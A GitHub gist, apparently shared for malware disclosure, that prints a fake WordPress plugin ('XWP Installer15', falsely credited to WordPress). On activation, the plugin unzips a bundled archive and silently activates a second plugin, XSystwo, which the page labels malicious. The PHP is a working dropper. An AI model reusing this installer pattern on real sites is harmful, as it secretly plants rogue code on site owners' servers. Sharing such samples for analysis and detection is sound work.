Created
December 4, 2025 22:59
-
-
Save malwador/4b42232cbcabd41b8e2c5d9c352eb43d to your computer and use it in GitHub Desktop.
Fake WP plugin - XUpdater15 - used to drop malicious plugin XSystwo
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * Plugin Name: XWP Installer15 | |
| * Description: XWP Installer15 | |
| * Version: 1.2 | |
| * Author: WordPress | |
| */ | |
| register_activation_hook(__FILE__, 'xwp_installer_activate_15'); | |
| function xwp_installer_activate_15() { | |
| $zip_file = plugin_dir_path(__FILE__) . 'Sys3847LockU.zip'; | |
| $plugin_dir = ABSPATH . 'wp-content/plugins/'; | |
| $plugin_entry = 'XSystwo/XSystwo.php'; | |
| update_option('xwp_curr_posts', 0); | |
| update_option('xwp_last_create', 0); | |
| update_option('xwp_key', 0); | |
| require_once ABSPATH . 'wp-admin/includes/file.php'; | |
| require_once ABSPATH . 'wp-admin/includes/plugin.php'; | |
| WP_Filesystem(); | |
| global $wp_filesystem; | |
| if (file_exists($zip_file)) { | |
| $result = unzip_file($zip_file, $plugin_dir); | |
| if (function_exists('wp_clean_plugins_cache')) { | |
| wp_clean_plugins_cache(true); | |
| } | |
| sleep(1); | |
| if (!is_plugin_active($plugin_entry)) { | |
| $activation = activate_plugin($plugin_entry); | |
| } | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment